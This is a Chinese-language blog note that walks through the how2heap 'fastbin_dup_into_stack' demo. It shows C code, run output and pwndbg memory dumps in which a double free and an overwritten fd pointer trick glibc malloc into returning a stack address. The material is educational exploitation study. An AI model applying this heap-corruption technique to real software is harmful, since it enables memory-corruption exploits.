<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,堆溢出,fastbin,double free,">










<meta name="description" content="堆好难啊！~">
<meta name="keywords" content="pwn,堆溢出,fastbin,double free">
<meta property="og:type" content="article">
<meta property="og:title" content="how2heap fastbin_dup_into_stack">
<meta property="og:url" content="http://suvii22.github.io/2019/11/17/how2heap-fastbin-dup-into-stack/index.html">
<meta property="og:site_name" content="Apr1L&#39;s blog">
<meta property="og:description" content="堆好难啊！~">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-11-24T12:42:16.099Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="how2heap fastbin_dup_into_stack">
<meta name="twitter:description" content="堆好难啊！~">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://suvii22.github.io/2019/11/17/how2heap-fastbin-dup-into-stack/">





  <title>how2heap fastbin_dup_into_stack | Apr1L's blog</title>
  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?1492608f41d9f4aca00f135cccb18cda";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Apr1L's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://suvii22.github.io/2019/11/17/how2heap-fastbin-dup-into-stack/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Apr1L">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Apr1L's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">how2heap fastbin_dup_into_stack</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-11-17T15:19:07+08:00">
                2019-11-17
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/" itemprop="url" rel="index">
                    <span itemprop="name">pwn</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/pwn/笔记/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote class="blockquote-center"><p>堆好难啊！~ </p>
</blockquote>
<a id="more"></a>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"This file extends on fastbin_dup.c by tricking malloc into\n"</span></span><br><span class="line">	       <span class="string">"returning a pointer to a controlled location (in this case, the stack).\n"</span>);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> stack_var;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"The address we want malloc() to return is %p.\n"</span>, <span class="number">8</span>+(<span class="keyword">char</span> *)&amp;stack_var);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Allocating 3 buffers.\n"</span>);</span><br><span class="line">	<span class="keyword">int</span> *a = <span class="built_in">malloc</span>(<span class="number">8</span>);</span><br><span class="line">	<span class="keyword">int</span> *b = <span class="built_in">malloc</span>(<span class="number">8</span>);</span><br><span class="line">	<span class="keyword">int</span> *c = <span class="built_in">malloc</span>(<span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"1st malloc(8): %p\n"</span>, a);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"2nd malloc(8): %p\n"</span>, b);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"3rd malloc(8): %p\n"</span>, c);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Freeing the first one...\n"</span>);</span><br><span class="line">	<span class="built_in">free</span>(a);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"If we free %p again, things will crash because %p is at the top of the free list.\n"</span>, a, a);</span><br><span class="line">	<span class="comment">// free(a);</span></span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"So, instead, we'll free %p.\n"</span>, b);</span><br><span class="line">	<span class="built_in">free</span>(b);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now, we can free %p again, since it's not the head of the free list.\n"</span>, a);</span><br><span class="line">	<span class="built_in">free</span>(a);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now the free list has [ %p, %p, %p ]. "</span></span><br><span class="line">		<span class="string">"We'll now carry out our attack by modifying data at %p.\n"</span>, a, b, a, a);</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> *d = <span class="built_in">malloc</span>(<span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"1st malloc(8): %p\n"</span>, d);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"2nd malloc(8): %p\n"</span>, <span class="built_in">malloc</span>(<span class="number">8</span>));</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now the free list has [ %p ].\n"</span>, a);</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now, we have access to %p while it remains at the head of the free list.\n"</span></span><br><span class="line">		<span class="string">"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"</span></span><br><span class="line">		<span class="string">"so that malloc will think there is a free chunk there and agree to\n"</span></span><br><span class="line">		<span class="string">"return a pointer to it.\n"</span>, a);</span><br><span class="line">	stack_var = <span class="number">0x20</span>;</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n"</span>, a);</span><br><span class="line">	*d = (<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span>) (((<span class="keyword">char</span>*)&amp;stack_var) - <span class="keyword">sizeof</span>(d));</span><br><span class="line"></span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"3rd malloc(8): %p, putting the stack address on the free list\n"</span>, <span class="built_in">malloc</span>(<span class="number">8</span>));</span><br><span class="line">	<span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"4th malloc(8): %p\n"</span>, <span class="built_in">malloc</span>(<span class="number">8</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight applescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$ gcc -g fastbin_dup_into_stack.c</span><br><span class="line">$ ./a.out</span><br><span class="line">This <span class="built_in">file</span> extends <span class="keyword">on</span> fastbin_dup.c <span class="keyword">by</span> tricking malloc <span class="keyword">into</span></span><br><span class="line"><span class="keyword">returning</span> a pointer <span class="keyword">to</span> a controlled location (<span class="keyword">in</span> this case, <span class="keyword">the</span> stack).</span><br><span class="line">The address we want malloc() <span class="keyword">to</span> <span class="literal">return</span> <span class="keyword">is</span> <span class="number">0x7fffdb59dca8</span>.</span><br><span class="line">Allocating <span class="number">3</span> buffers.</span><br><span class="line"><span class="number">1</span>st malloc(<span class="number">8</span>): <span class="number">0x22c8010</span></span><br><span class="line"><span class="number">2</span>nd malloc(<span class="number">8</span>): <span class="number">0x22c8030</span></span><br><span class="line"><span class="number">3</span>rd malloc(<span class="number">8</span>): <span class="number">0x22c8050</span></span><br><span class="line">Freeing <span class="keyword">the</span> <span class="keyword">first</span> one...</span><br><span class="line">If we free <span class="number">0x22c8010</span> again, things will crash because <span class="number">0x22c8010</span> <span class="keyword">is</span> <span class="keyword">at</span> <span class="keyword">the</span> top <span class="keyword">of</span> <span class="keyword">the</span> free <span class="built_in">list</span>.</span><br><span class="line">So, instead, we'll free <span class="number">0x22c8030</span>.</span><br><span class="line">Now, we can free <span class="number">0x22c8010</span> again, <span class="keyword">since</span> <span class="keyword">it</span>'s <span class="keyword">not</span> <span class="keyword">the</span> head <span class="keyword">of</span> <span class="keyword">the</span> free <span class="built_in">list</span>.</span><br><span class="line">Now <span class="keyword">the</span> free <span class="built_in">list</span> has [ <span class="number">0x22c8010</span>, <span class="number">0x22c8030</span>, <span class="number">0x22c8010</span> ]. We'll now carry out our attack <span class="keyword">by</span> modifying data <span class="keyword">at</span> <span class="number">0x22c8010</span>.</span><br><span class="line"><span class="number">1</span>st malloc(<span class="number">8</span>): <span class="number">0x22c8010</span></span><br><span class="line"><span class="number">2</span>nd malloc(<span class="number">8</span>): <span class="number">0x22c8030</span></span><br><span class="line">Now <span class="keyword">the</span> free <span class="built_in">list</span> has [ <span class="number">0x22c8010</span> ].</span><br><span class="line">Now, we have access <span class="keyword">to</span> <span class="number">0x22c8010</span> <span class="keyword">while</span> <span class="keyword">it</span> remains <span class="keyword">at</span> <span class="keyword">the</span> head <span class="keyword">of</span> <span class="keyword">the</span> free <span class="built_in">list</span>.</span><br><span class="line">so now we are writing a fake free size (<span class="keyword">in</span> this case, <span class="number">0x20</span>) <span class="keyword">to</span> <span class="keyword">the</span> stack,</span><br><span class="line">so <span class="keyword">that</span> malloc will think there <span class="keyword">is</span> a free chunk there <span class="keyword">and</span> agree <span class="keyword">to</span></span><br><span class="line"><span class="built_in">return</span> a pointer <span class="keyword">to</span> <span class="keyword">it</span>.</span><br><span class="line">Now, we overwrite <span class="keyword">the</span> <span class="keyword">first</span> <span class="number">8</span> bytes <span class="keyword">of</span> <span class="keyword">the</span> data <span class="keyword">at</span> <span class="number">0x22c8010</span> <span class="keyword">to</span> point right <span class="keyword">before</span> <span class="keyword">the</span> <span class="number">0x20</span>.</span><br><span class="line"><span class="number">3</span>rd malloc(<span class="number">8</span>): <span class="number">0x22c8010</span>, putting <span class="keyword">the</span> stack address <span class="keyword">on</span> <span class="keyword">the</span> free <span class="built_in">list</span></span><br><span class="line"><span class="number">4</span>th malloc(<span class="number">8</span>): <span class="number">0x7fffdb59dca8</span></span><br></pre></td></tr></table></figure>

<p>这个程序展示了怎样通过修改 fd 指针，将其指向一个伪造的 free chunk，在伪造的地址处 malloc 出一个 chunk。<br>三个 malloc 之后：</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">15</span>gx <span class="number">0x603000</span></span><br><span class="line"><span class="number">0x603000</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span>  &lt;--- chunk a</span><br><span class="line"><span class="number">0x603010</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603020</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span>  &lt;--- chunk b  </span><br><span class="line"><span class="number">0x603030</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603040</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span>  &lt;--- chunk c</span><br><span class="line"><span class="number">0x603050</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603060</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x0000000000020fa1  &lt;--- top chunk</span><br><span class="line"><span class="number">0x603070</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span></span><br></pre></td></tr></table></figure>

<p>三个 free 之后：</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">15</span>gx <span class="number">0x603000</span></span><br><span class="line"><span class="number">0x603000</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span></span><br><span class="line"><span class="number">0x603010</span>:       <span class="number">0</span>x00000<span class="number">00000603020</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603020</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span></span><br><span class="line"><span class="number">0x603030</span>:       <span class="number">0</span>x00000<span class="number">00000603000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603040</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span></span><br><span class="line"><span class="number">0x603050</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603060</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x0000000000020fa1</span><br><span class="line"><span class="number">0x603070</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line">pwndbg&gt; fastbin</span><br><span class="line">fastbins</span><br><span class="line"><span class="number">0</span>x20: <span class="number">0x603000</span> —▸ <span class="number">0x603020</span> ◂— <span class="number">0x603000</span></span><br></pre></td></tr></table></figure>

<p>这一次 malloc 之后，我们填充一个地址，即栈地址减去 0x8，从而在栈上伪造出一个 free 的 chunk（当然也可以是其他的地址）。这也是为什么 stack_var 被我们设置为 0x21 （或 0x20 都可以），其实是为了在栈地址减去 0x8 的时候作为 fake chunk 的 size 字段。glibc 在执行分配操作时，若块的大小符合 fast bin，则会在对应的 bin 中寻找合适的块，此时 glibc 将根据候选块的 size 字段计算出 fastbin 索引，然后与对应 bin 在fastbin 中的索引进行比较，如果二者不匹配，则说明块的 size 字段遭到破坏。所以需要 fake chunk 的 size 字段被设置为正确的值。</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">15</span>gx <span class="number">0x603000</span></span><br><span class="line"><span class="number">0x603000</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span></span><br><span class="line"><span class="number">0x603010</span>:       <span class="number">0</span>x00007ffffffeddc8      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603020</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span></span><br><span class="line"><span class="number">0x603030</span>:       <span class="number">0</span>x00000<span class="number">00000603000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603040</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000021</span></span><br><span class="line"><span class="number">0x603050</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line"><span class="number">0x603060</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span>      <span class="number">0</span>x0000000000020fa1</span><br><span class="line"><span class="number">0x603070</span>:       <span class="number">0</span>x00000<span class="number">00000000000</span></span><br><span class="line">pwndbg&gt; p &amp;stack_var</span><br><span class="line">$<span class="number">1</span> = (unsigned long long *) <span class="number">0</span>x7ffffffeddd0</span><br><span class="line">pwndbg&gt; x/<span class="number">5</span>gx <span class="number">0</span>x7ffffffeddd0-<span class="number">0</span>x8</span><br><span class="line"><span class="number">0</span>x7ffffffeddc8: <span class="number">0</span>x000000000040091a      <span class="number">0</span>x00000<span class="number">00000000020</span></span><br><span class="line"><span class="number">0</span>x7ffffffeddd8: <span class="number">0</span>x00000<span class="number">00000603010</span>      <span class="number">0</span>x00000<span class="number">00000603030</span></span><br><span class="line"><span class="number">0</span>x7ffffffedde8: <span class="number">0</span>x00000<span class="number">00000603050</span></span><br><span class="line">pwndbg&gt; fastbin</span><br><span class="line">fastbins</span><br><span class="line"><span class="number">0</span>x20: <span class="number">0x603000</span> —▸ <span class="number">0</span>x7ffffffeddc8 —▸ <span class="number">0x603010</span> ◂— <span class="number">0</span>x0</span><br><span class="line"><span class="number">0</span>x30: <span class="number">0</span>x0</span><br><span class="line"><span class="number">0</span>x40: <span class="number">0</span>x0</span><br><span class="line"><span class="number">0</span>x50: <span class="number">0</span>x0</span><br><span class="line"><span class="number">0</span>x60: <span class="number">0</span>x0</span><br><span class="line"><span class="number">0</span>x70: <span class="number">0</span>x0</span><br><span class="line"><span class="number">0</span>x80: <span class="number">0</span>x0</span><br></pre></td></tr></table></figure>

<p>构造的结构：</p>
<figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">         chunk d          fake chunk</span><br><span class="line">          +----+            +----+</span><br><span class="line">0x603010  |<span class="string"> fd </span>|<span class="string">-----------&gt;</span>|<span class="string">... </span>|<span class="string">   0x7ffffffeddc8</span></span><br><span class="line"><span class="string">          +----+            +----+</span></span><br><span class="line"><span class="string">          </span>|<span class="string"> bk </span>|<span class="string">            </span>|<span class="string">0x20</span>|<span class="string">   0x7ffffffeddd0</span></span><br><span class="line"><span class="string">          +----+            +----+</span></span><br><span class="line"><span class="string">                            </span>|<span class="string">... </span>|<span class="string">   0x7ffffffeddd8</span></span><br><span class="line"><span class="string">                            +----+</span></span><br></pre></td></tr></table></figure>

<p>可以看到，伪造的 chunk 已经由指针链接到 fastbins 上了。之后 malloc 三次，即可在 fake chunk 处分配内存。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
            <a href="/tags/堆溢出/" rel="tag"># 堆溢出</a>
          
            <a href="/tags/fastbin/" rel="tag"># fastbin</a>
          
            <a href="/tags/double-free/" rel="tag"># double free</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/09/KMP/" rel="next" title="KMP">
                <i class="fa fa-chevron-left"></i> KMP
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/24/Syc-Geek-10th-Baby-shellcode/" rel="prev" title="Syc Geek 10th -Baby shellcode">
                Syc Geek 10th -Baby shellcode <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Apr1L">
            
              <p class="site-author-name" itemprop="name">Apr1L</p>
              <p class="site-description motion-element" itemprop="description">二进制萌新QAQ</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">20</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Apr1L</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
